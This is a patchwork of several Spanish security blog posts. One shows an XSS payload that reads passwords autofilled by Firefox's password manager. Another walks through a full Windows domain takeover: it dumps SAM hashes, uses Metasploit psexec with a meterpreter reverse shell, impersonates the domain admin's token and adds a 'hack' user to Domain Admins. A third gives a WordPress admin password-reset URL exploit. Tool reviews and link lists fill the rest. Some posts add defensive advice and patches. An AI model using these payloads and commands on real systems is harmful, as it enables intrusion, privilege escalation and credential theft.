El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente el formulario desde el cual se guarda la clave en el administrador de contraseñas, por lo tanto si a la pagina donde se encuentra el formulario de logueo se le puede realizar un XSS es posible agregar un formulario con un campo oculto del tipo “password” y al acceder a ella, firefox no solo llenara el formulario real de acceso automáticamente, sino también el formulario oculto que acabamos de inyectar.

Si le echamos un vistoso al formulario utilizando el plugin Web Developer para el Mozilla Firefox, encontramos que efectivamente el Administrador de Contraseñas, nos llenó el formulario oculto que colocamos en la pagina mediante XSS con nuestra clave de acceso:

El código utilizado para robar la información del Administrador de contraseñas en el Mozilla Firefox:

<script> document.write('<form><input id=p type=password style=visibility:hidden></form>'); setTimeout('alert("Password: " + document.getElementById("p").value)', 100); </script>

Podemos modificar el formulario para que nos envié la contraseña capturada a un archivo en el que puede ser almacenada o enviada por correo electrónico, pero en esta prueba de concepto no lo realizaremos.

En este caso contar con “clave maestra” en el administrador de contraseñas del Mozilla Firefox no supone una “barrera” para que obtengan nuestras claves, ya que una vez ingresada la clave maestra, el Firefox llenara de todas formas el formulario con nuestra clave.

Aunque posiblemente una técnica similar pueda funcionar en otros navegadores, he realizado pruebas en Google Chrome, Safari y Opera siendo el Mozilla Firefox el único afectado.

Actualización:
Un fallo similar fue reportado en el 2006 y supuestamente fue resuelto “VERIFIED FIXED”, pero acabo de probar con la prueba de concepto que publicaron en esa ocasión y sigue siendo vulnerable.

Recomendaciones:

• Escribe “about:config” en la barra del Firefox para desactivar (poner en “false”) la función signon.autofillForms



Con esto deshabilitas la función de auto llenado del administrador de contraseñas y evitarnos ser victimas de este fallo.

• Utilizar el plugin NoScript (si no hay inyección de código, no hay problema)
• No utilizar el Administrador de Contraseñas de Mozilla Firefox (ya hemos demostrado que no es recomendable, ni en firefox, ni en ningún navegador), en vez de el utilizar servicios gratuitos como LastPass (al que por cierto le debo un articulo entero)

Mas Información:
XSS demo for stealing passwords from the Firefox password manager

También puede interesarte...

• ¿Cómo Recuperar una Cuenta de Facebook?
• Resetear Password de Root
• Como Recuperar Clave MySQL
• Listado de Diccionarios para Realizar Ataques de Fuerza Bruta
• “1234″ y “password” son las Contraseñas + Utilizadas en USA
• Las Peores 500 Contraseñas de Todos los Tiempos
• PassPub, Generador de Contraseñas Seguras
• Maneja tus Contraseñas de Forma Sencilla

En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:

REQUISITOS

• Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
• Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
• Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
• Una copia de BackTrack 4

Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:

Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:

• mount /dev/sda1 /mnt/sda1
  Montamos la particion de la maquina windows
• cd /mnt/sda1/WINDOWS/system32/config
  accedemos a la carpeta dodne se encuentra el archivo SAM
• samdump2 system SAM
  sacamos los hash de los usuarios en la maquina windows
• msfconsole
  ejecutamos el metasploit por consola
• use windows/smb/psexec
  utilizamos el psexec
• exploit -p windows/meterpreter/reverse_tcp -o
  utilizamos la shell meterpreter
• LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j
  configuramos las opciones del exploit
• sessions -i 1
  una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra
• use incognito
  utilizamos el modulo incognito de meterpreter
• list_tokens -u
  mostramos los tokens
• impersonate_token mydomain\\domainadmin
  tomamos las credenciales del administrador de dominio
• execute -f cmd.exe -i -t
  lanzamos la consola de windows
• net user hack MPass5678 /add /domain
  Agregamos el usuario “hack” con clave “MPass46782″ al dominio
• net group “Domain Admins” hack /add /domain
  metemos el usuario hack al grupo de administradores de dominio
• Ya hemos tomado el control del dominio de windows

Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean.

PD. en Securitytube.net existe un vídeo en el que realizan este mismo procedimiento un poco mas “a mano” pero que puede servirnos también en nuestro proceso de aprendizaje.

También puede interesarte...

• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Como realizar un borrado seguro usando BleachBit
• Video: Explotando WM Downloader
• Como Recuperar Clave MySQL
• Vídeo: Introducción al Metasploit Framework
• Metasploit Framework 3.3.2

Existen muchos programas de este tipo, uno de los mas populares es el Process Explorer de la empresa sysinternals que fue comprada por Microsoft, precisamente por esa compra process explorer ha perdido adeptos (aunque no calidad) y muchos han optado por alternativas totalmente libres como Process Hacker.

A diferencia de otros administradores de tareas, Process Hacker cuenta con su propio drivers para manejar los procesos del sistema, lo que le permite matar procesos incluso si estos están siendo utilizados por el sistema operativo u otras aplicaciones, esta funcionalidad también le permite ver procesos que pueden estar ocultos al “administrador de tareas” de windows, pero no solo podemos ver y eliminar procesos, también podemos realizar las mismas tareas con los servicios del sistema, podemos ver que aplicaciones están haciendo uso de nuestra conexión y con quien se están comunicando.

Sólo funciona en Windows XP o superior de 32 bits y requiere del .NET Framework 2.0. En las versiones de 64 bits su funcionalidad se ve enormemente reducida a causa de que sólo son permitidos drivers firmados con un certificado digital válido emitido por una entidad de confianza, por lo que si deseamos poder cargar el driver de Process Hacker deberemos deshabilitar esta característica que viene por defecto en los sistemas de 64 bits.

Descargar Process Hacker, excelente administrador de Procesos en Microsoft Windows

Para Mas Información:
Pagina Oficial del Process Hacker
Pagina Oficial del Process Explorer

También puede interesarte...

• Herramienta Anti Forense para Windows
• Denegacion de Servicio desde el WordPad
• WUDE 3.0
• Actualiza tu equipo con Windows
• Actualiza tu software con Secunia Personal Software Inspector
• ¿Cómo tomar control de un Dominio en Windows?
• Como realizar un borrado seguro usando BleachBit
• Vulnerabilidad 0-day en todas las versiones de Windows

Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su propio panel de administración, el error se encuentra en el archivo wp-login.php que no valida adecuadamente.
Un visitante mal intencionado puede resetear el password de administrador con solo visitar un enlace como el siguiente:

http://PAGINAAQUI.COM/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag

La buena noticia es que igual de fácil a su explotación es su solución, basta con buscar en el archivo wp-login.php el código:

if ( empty( $key ) )

y remplazarlo por:

if ( empty( $key ) || is_array( $key ) )

Aunque como siempre es recomendable que actualices tu versión a la WordPress a la 2.8.4 aun no sale oficialmente en español, pero puedes utilizar este paquete de idiomas para traducirlo.

También puede interesarte...

• WordPress 2.6.3 vulnerable a Cross Site Scripting
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• XSS que permite postear a atacante registrado en WordPress
• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2
• Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux
• Actualiza a WordPress 2.6.5
• Actualiza a WordPress 2.6.3
• 2 Problemas graves que se solucionan en WordPress 2.6.2

En el curso de Redes en GNU Linux, aprenderemos  a administrar correctamente una red creada con GNU Linux, a montar diferentes servicios de red y otras labores propias de un administrador de red.

Las tematicas tratadas en el curso de redes con GNU/Linux son:

• Introducción
• Usuarios del sistema Unix
• Servidor DCHP
• Servidor DNS
• Entidad Certificadora
• Servidor web Apache
• NFS
• Samba
• Otros servicios
• Copias de seguridad (Backup)
• Servidores de Impresión
• Servidor de terminales
• VNC
• OpenLDAP
• Enrutamiento
• Varios

Descargar Gratis el Curso de Redes con GNU Linux

Mirror I

Los otros cursos de esta serie:

1. Curso de Ubuntu
2. Curso de Redes con GNU Linux
3. Curso de Joomla Gratis
4. Curso de Dibujo Vectorial con OpenOffice Draw

También puede interesarte...

• Curso de Ubuntu
• Cursos Gratis de Diseño Web en el Sena Virtual
• Curso en el Sena Virtual sobre Auditoria en Seguridad
• Comunidad DragonJAR en Open Source University Meetup – OSUM
• IPTraf, estadísticas sobre el tráfico de tu red
• Cursos Gratuitos de Programacion en el SENA VIRTUAL
• Sena Virtual – Cursos virtuales GRATIS en el Sena
• Revista UXi, La Revista de Software Libre y Código Abierto de la UCI

Gracias a blogsecurity y a ayudawordpress me entero de una vulnerabilidad descubierta por Jeremias Reith en WordPress 2.6.3  que podría permitir a un atacante sin identificar acceder a tu blog.

El fallo se encuentra en la funcion “self_link() “del  archivo “wp-includes/feed.php” que al no validar correctamente los parametros de entrada permite realizar un ataque XSS con el que se pueden acceder a las cookies del usuario y obtener privilegios de administrador.

Este problema se solucionó en la versión WordPress 2.6.5, si no quieres dar todavia el paso a la version 2.7 de wordpress es recomendable que actualices tu version a la 2.6.5 para resolver este problema de seguridad.

Jeremias ha publicado un aviso en Bugtraq, en el que se explica en detalla tecnicamente el error e incluye un una prueba de concepto

También puede interesarte...

• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2
• XSS que permite postear a atacante registrado en WordPress
• Denegacion de Servicio en WordPress
• Reseteo Remoto del Password de Admin en WordPress
• Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3
• Los Blogs alojados en WordPress.com Vulnerables
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• ¿Cómo tomar control de un Dominio en Windows?

Hoy les presento PassPub una herramienta que nos permite generar contraseñas seguras sin mucho esfuerzo y con una interface sencilla y amigable.

Recordemos que un password seguro debe sobrepasar los 6 caracteres combinando números, letras y símbolos (4qu1.µn3j3mp!0.de.p@ssw0rd.s3gµr0) dificultando asi la tarea de recuperar este por métodos como fuerza bruta, obviamente este tipo de contraseñas es mucho mas difícil de recordar que “micontrasena1″ pero es mucho mas seguro (ademas para administrar nuestras contraseñas tenemos Myvidoop)

PassPub nos permite generar contraseñas de 64, 128 o 256bits para redes inalambricas, también podemos generar passwords de 6, 8, 10 o 12 caracteres de longitud, convinaciones basadas en la tabla periodica y otras convinaciones.

Generar Passwords con PassPub

Mas Información:
Puedes encontrar mas información en (I II III IV V)

También puede interesarte...

• Maneja tus Contraseñas de Forma Sencilla
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• ¿Cómo tomar control de un Dominio en Windows?
• Como Recuperar Clave MySQL
• CeWL – Generador de Diccionarios Personalizados
• ¿Como Eliminar la Contraseña de un PDF?
• Nueva versión de Cain & Abel
• Reseteo Remoto del Password de Admin en WordPress

Myvidoop es una utilidad que nos permite almacenar todas nuestras contraseñas de servicios web (redes sociales, correos, foros, etc…) en un solo sitio y tras una sola clave (mas adelante veremos las ventajas y desventajas de esto), esta clave única consta de un conjunto de imágenes en una especie de matriz, cuando seleccionemos la combinación correcta de imágenes, se nos rellenara el formulario de acceso del sitio en el que nos encontremos y de esta forma podremos ingresar.

Myvidoop funciona gracias a un plugin que se integra con el navegador el cual almacena las claves de todos los servicios que tengamos asociados con Myvidoo.

Myvidoop también funciona como identificación de OpenID, por lo que podrás usar tu cuenta Myvidoop para loguearte en cualquier pagina que cuente con los servicios de OpenID.

Tenemos a disposición un panel desde el cual podremos agregar las contraseñas para los servicios deseados, agrupar y gestionar contraseñas, ver y activar las ips desde donde vamos a utilizar el servicio y otras funciones.

PRO`s

• Podrás utilizar claves seguras (números, letras, caracteres etc) de la longitud que desees sin preocuparte de olvidar luego esta clave.
• Es portable, solo tienes que instalar el plugin en el navegador que te encuentres, acceder a tu cuenta y hay tendrá tus claves.
• Adiós a los keyloggers, al no digitar tu password bajas considerablemente el riesgo a que te quiten tus claves por este medio (ojo, existen keyloggers que pueden capturar la pantalla o grabar vídeo, a estos si sos vulnerable).
• Es muy fácil de usar.

CONTRAS

• Tendremos que confiar en la ética de Myvidoop, ¿quien nos garantiza que no usen nuestros datos?.
• En caso de ser atacado el portal dejamos al descubierto todos nuestras contraseñas a disposición de un atacante (no estoy diciendo que no cuenten con la seguridad necesaria para prestar un servicio como este, solo digo… en el peor de los casos).

Con esta herramienta es mucho mas fácil seguir consejos de seguridad tan simples como utilizar una clave diferente para cada portal, o usar números, letras y símbolos en nuestras contraseñas.

Para mas información:
Pagina Oficial de Myvidoop
Aquí un vídeo donde explican cono funciona el sistema.

También puede interesarte...

• PassPub, Generador de Contraseñas Seguras
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Resetear Password de Root
• Reseteo Remoto del Password de Admin en WordPress
• Webtunnel – Herramienta para realizar Encapsulación HTTP
• Descargar Gratis Internet Explorer 8 Final
• Cursos Gratis de Diseño Web en el Sena Virtual
• Recuperar Contraseñas de Windows Vista y Anteriores